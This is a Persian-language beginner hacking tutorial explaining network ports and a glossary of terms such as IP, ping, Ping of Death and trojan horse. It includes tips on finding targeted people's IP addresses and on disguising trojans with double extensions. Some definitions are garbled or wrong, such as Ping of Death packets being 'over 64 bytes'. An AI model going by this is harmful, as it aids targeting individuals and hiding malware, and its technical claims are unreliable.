منظور ما در اينجا پورتهاى سخت افزارى مثل USB و COM و ... نيستند . منظور از پورت كانالهاى مجازى براى ارتباط با شبكه است كه تعداد آنها 65535 عدد مى باشد . پورتهاى شماره 0 تا 1023 از قبل رزرو شده اند و براى هر كدام وظيفه مشخصى تعيين شده . البته اين به آن معنى نيست كه سو استفاده از آنها غير ممكن است . در واقع دربحث هك سرورها و سايتها اين پورتها اهميت زيادى دارند ، ولى براى هك كردن كامپيوترهاى شخصى بيشتر برنامه هاى هك از پورتهاى 1024 تا 49151 و يا از پورتهاى 49152 تا 65535 استفاده مى نمايند . هر برنامه هك پورت پيش فرضى را هدف مى گيرد كه اين مورد توسط هكر نيز قابل تغيير و تنظيم است . در انتهاى اين بخش در جدولى پورتهاى استفاده شده توسط بعضى از نرم افزارهاى مشهور هك ذكر مى گردد . اگر فرمان netstat را در بخش قبل به خاطر بياوريد به استفاده از آن شما مى توانيد پورتهاى باز كامپيوتر خود را با اين جدول مقايسه كنيد تا ببينيد در حال حاضر برنامه هكى روى كامپيوتر نصب شده يا نه؟البته همانطور كه گفتم افراد باهوش اين شماره پورت را تغيير مى دهند و به اين طريق نه تنها شما بلكه بسيارى از ديواره هاى آتش را نيز فريب مى دهند

در اين مرحله ما به شما چيزهايی آموزش می دهيم که برای شروع .حتمآ بايد بلد باشيد يا حداقل مطالبی را بدانيد که اگر با اين کلمات بر خورديد بدانيد منظور چيست. واژه هايی را که به شما برای يادگيری می گويم عبارتند از:
Isp.internt Protocol.internt Protocol Address. Packet.ping.ping Of Death.ping Packet.ip Addreess.icq.host.port Number.trojan Horse.
***isp***
((internt Servise Provider))
به معنی تامين كننده خدمات اينترنت است . اداره يا شركتی كه خدمات اتصال به اينترنت را برای اشخاص، ادارات و سازمانهای ديگر فراهم . ميكند.برخی از ای ـاس ـ پی‌ها شركتهای بزرگ ملی يا چند مليتی هستند
***ip***
((internt Protocol))
پروتكلی در:
Tcp/ip
كه بر تجزيه پيامهای داده ای به بسته های لازم ، هدايت بسته ها از فرستنده به شبكه و ايستگاه كاری مقصد و تبديل مجدد بسته ها به پيام های اوليه در مقصد نضارت دارد.
Ip در لا يه Interntwork مدل Tcp/ip اجرا می شود _ معادل لايهnetwork در مدل مرجع
Iso/osi

***نشانیip***
Internt Protocol Address
يك عدد دو دويی 32بيتی (4بايتی) که ميزبان (کامپيوتر) متصل به اينترنت برای مفاصد ارتباطی
از طريق انتقال بسته ها (packets)به ساير ميزبانهای اينترنت می شناسند.هر نشانی Ipبا فرمت قسمتی متشکل از مقادير دسيمال4بايتی که با نقطه از يکديگر جدا می شوند نشان داده می شود:به عنوان مثال .127.00.1 1يا 2 يا3بايت نخست برای شناسايی شبکه ای هستند که ميزبان به آن متصل است :مابقی بيتها برای شناسایِی خود ميزبان است .32 بيت با هر4بايت با هم ميتوانند تقريبآ 2به توان 32.تقريبآ 4 ميليارد ميزبان را شناسايی کنند.(تعداد کمی از اين مجموعه به کار برده نميشوند).
Internt Protocol Number نيز ناميده ميشوند.

***pocket***
واحد ی از اطلاعات که در يک شبکه به صورت واحد از يک وسيله به يک وسيله ديگر انتقال ميابد
در شبکه های Packet_switching به واحدی از انتقالات گفته ميشود که حداکثر اندازه ثابت را دارد .و ازارقام باينری تشکيل می شود که هم نمايان گر داده ها هستند و هم سرايندی که حاوی يک شماره شناسايی .نشانی مبدا و مقصد و گاهی اوقات داده های کنترل خطا.
***ping***
سرنام Pocket Internt Groper.پروتکلی برای ازمايش اينکه يک کامپيوتر خاص به اينترنت متصل است يا خير.برای اين کار بسته ای برای دريافت به نشانی Ip آن ارسال می شود.
نام اين روش از روشی که در زير در يايی ها بکار برده می شده است گرفته شده است.در روش مذکوريک سيگنال صوتی .به نام "ping"انشار می يابد واز بازتاب ان اشيا پيرامون زير دريايی شناسايی می شوند.
***ping Of Death***
نوعی خرابکاری در اينترنت که بسته ای از طريق پروتکل Ping به يک کامپيوتر راه دور ارسال ميشود که اساسا بزرگتر از 64 بايت معمول است.اندازه بسته سبب می شود که کامپيوتر متوقف شود (hang)يا مجددا راه اندازی شود (boot).
***ping Packet***
يک پيام "are You There" که به وسيله ی يک برنامه Packet Internt Groper ارسال می شود.اين بسته از يک گره به نشانی Ip کامپيوتری ارسال می شود که گره قادر به ارسال ويا در يافت اطلاعات هست يا خير.با بسياری از برنامه های خدماتی رايگان و عمومی اين کار را می توان از طريق اينترنت برای کامپيوتر های شخصی Download نمود.
***ip Addreess***
چون تقريبآ تمامی روشهای هک با Ip Address سرو کاردارند شما بايد بتوانيد Ip سايت ها یا افراد مورد نظرتان را پيدا کنيد.
برای پيدا کردن Ip وب سايت ها بايد اول وارد محيط Dos شده و سپس دستور Ping را نوشته و روبروی ان ادرس وب سايت مورد نظر خود را بنويسيد . بعد از اينتر کردن شماره Ip مورد نظر را يادداشت کنيد.
برای پيدا کردن شماره Ip خودتان می بايست در محيط داس دستور Ipconfig را تايپ کنيد و يا برای بهتر انجام شدن کار برنامه My Ip Finder را تهيه کنيد و اجرا نماييد. برای پيدا کردن Ip افراد مورد نظرتان کافيست برنامه Black Ice يا هر برنامه Ip Finder ديگری را بر روی کامپيوتر خود نصب کنيد با اين کار اگر هر گونه Packet از طرف شخص مورد نظر شما ارسال می شود و يا از سوی شما يک Packet شمال فايل يا پيغامی برای او فرستاده شود برنامه Ip Finder شماره Ip او را به شما می دهد .
((توجه: برای پيداکردن شماره Ip افراد بدون داشتن نرم افزار بخصوص می بايست بر پروتکلها Tcp/ip و Ip تسلط کافی داشته باشيد و لازم به ذکر است که اين امر نيازمند مطالعه فراوان در مورد اين دو مقوله می باشد.
***icq***
Icq نرم افزاری است که توسط Mirabilis توليد شده است و هر گاه دوستان ، خانواده و يا کاربران تعيين شده ديگر به صورت Online به اينترنت متصل باشند ، به کاربران اينترنت اطلاع داده و امکان تبادل اطلاعات را به صورت بلادرنگ برای انها فراهم می سازد . کاربران از طريق Icq می توانند گفتگو کنند ، پست الکترونيکی ارسال کنند ، يا با استفاده از بورد های پيام (chat Room) به تبادل پيام بپردازند و علاوه بر اجرای برنامه های متفرقه ای (مثلا بازيها)که چندين نفر قادر به شرکت در آنها می باشند , Url و فايلها را نيز انتقال دهند .
کاربران می بايست فهرست کاربران مورد نظر خود را برای بر قراری ار تباط تکميل کنند. تمامی کاربران می بايست به سرويس دهنده Icq معرفی شوند و نرم افزار Icq در کامپيوترشان اجرا شود.
***host***
در اينترنت يا شبکه های بزرگ ديگر به کامپيوتر سرويس دهنده ای گفته می شود که به ديگر کامپيوتر های شبکه دستيابی دارد و وظيفه اش فراهم کردن خدمات برای کامپيوتر های سرويس گيرنده ای است که از نقات دور متصل می شوند.
مثلا دستيابی به اينترنت يا عمل کردن به عنوان منبع يا اخبار پستی.
***trojan Horse***
Trojan Horse يا اسبهای تروا برنامه های مخربی هستند که بصورت يک بازی , برنامه خدماتی يا برنامه های کاربردی پنهان می شوند . وقتی اين برنامه ها اجرا می شوند, در عين حالی که مفيد به نظر می رسند , عمل مخربی را در سيستم کامپيوتری انجام می دهند.
اين فايلها اکثرا اجرايی هستند ولی با يک پسوند دوم معرفی می شوند.مانند:file.exe.mp3
***port Number***
شماره پورت عددی است که امکان ارسال بسته های Ip به يک فرايند خاص از يکی از کامپيوتر های متصل به اينترنت را فراهم می کند.
برخی از اين شماره ها که تحت عنوان شماره های شناخته شده مطرح هستند, به طور
دايمی اختصاص می يابند؛ به عنوان مثال , داده های پست الکترونيکی تحت Smtp به پورت شماره 25 انتقال می يابند . فرايند ها مثلا يک جلسه Tel Net , به هنگام آغاز کار يک شماره
پورت زود گذر در يافت می کنند؛ داده ها ی آن جلسه کاری به ان انتقال می يابند ؛ و در پايان جلسه نيز شماره پورت کنار گذاشته می شود.
مجموعا 65535 شماره پورت برای استفاده Tco/ip در دسترس است و همين تعداد نيز برای Upd موجود است